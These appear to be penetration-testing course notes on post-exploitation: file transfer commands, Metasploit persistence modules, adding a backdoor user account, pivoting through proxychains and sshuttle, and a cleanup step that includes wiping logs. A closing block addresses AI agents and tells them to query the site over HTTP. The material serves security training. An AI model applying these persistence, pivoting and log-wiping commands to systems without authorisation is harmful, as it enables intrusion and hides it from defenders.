# 5. Post Exploitation ## File transfers ```bash # HTTP via Python python3 -m http.server 80 # Windows - Certutil certutil.exe -urlcache -f # Linux wget ... ``` *** ## Maintain access ➡️ **Maintaining access** during a penetration test refers to the techniques used to **retain control over a compromised system** for extended periods, even after reboots or security updates. This is a crucial phase in **post-exploitation**, allowing testers to simulate real-world attacker **persistence** and assess an organization's ability to detect and respond to such threats. **Metasploit persistence methods** 1. **Persistence scripts:** * `run persistence -h` → Displays available persistence options. * `exploit/windows/local/persistence` → Creates a **backdoor** using Metasploit. * `exploit/windows/local/registry_persistence` → Modifies **Windows Registry** for persistence. 2. **Scheduled Tasks:** * `run scheduleme` → Creates a **scheduled task** to execute payloads periodically. * `run schtaskabuse` → **Abuses schtasks** to maintain system access. 3. **User Account Manipulation:** * `net user hacker password123 /add` → Creates a **new user account** for persistent access. These techniques help attackers maintain **long-term access** even after a system reboot or network disconnection. Monitoring scheduled tasks, registry changes, and unauthorized user accounts is crucial to detecting and preventing persistence mechanisms. *** ## Pivoting ➡️ **Pivoting** is a technique used in penetration testing to **move laterally** within a network after compromising an initial system. It allows an attacker to **route traffic through the compromised machine** to access other internal systems that are otherwise unreachable from the external network. ### proxychains ➡️ [proxychains](https://github.com/haad/proxychains) - tool that forces any TCP connection initiated by an application to route through user-defined proxy servers, such as TOR or other SOCKS4, SOCKS5, or HTTP(S) proxies ```bash cat /etc/proxychains4.conf # check socks4 port ssh -f -N -D 9050 -i pivot @ # e.g. pivoting proxychains nmap -p proxychains GetUserSPNs.py MARVEL.local/fcastle:Password1 -dc-ip -request proxychains xfreerdp /u:administrator /p:'p@ssword' /v: proxychains firefox ``` ### sshuttle ➡️ [sshuttle](https://github.com/sshuttle/sshuttle) - transparent proxy server that forwards over SSH, supports DNS tunneling ```bash sshuttle -r @ --ssh-cmd "ssh -i pivot" # keep this terminal open # run commands in other terminals ``` ### chisel ➡️ [chisel](https://github.com/jpillora/chisel) - a fast TCP/UDP tunnel, transported over HTTP, secured via SSH *** ## Cleaning up ➡️ The **cleanup phase** is the final step in a penetration test, ensuring that **no traces** of testing activities remain on the target system or network. The goal is to restore the environment to its original state before the test, minimizing security risks and avoiding any disruption. * **Remove files** – Delete scripts, executables, and added files * **Eliminate persistence** – Remove malware, backdoors, tasks, and added user accounts * **Restore settings** – Revert settings, security configs, firewall rules, and permissions. * **Clear tracks** – Wipe command history and logs. 📌 From a hacker perspective, you need to "**make it look like you were never there**". *** --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://blog.syselement.com/tcm/courses/peh/5-post-exploitation.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.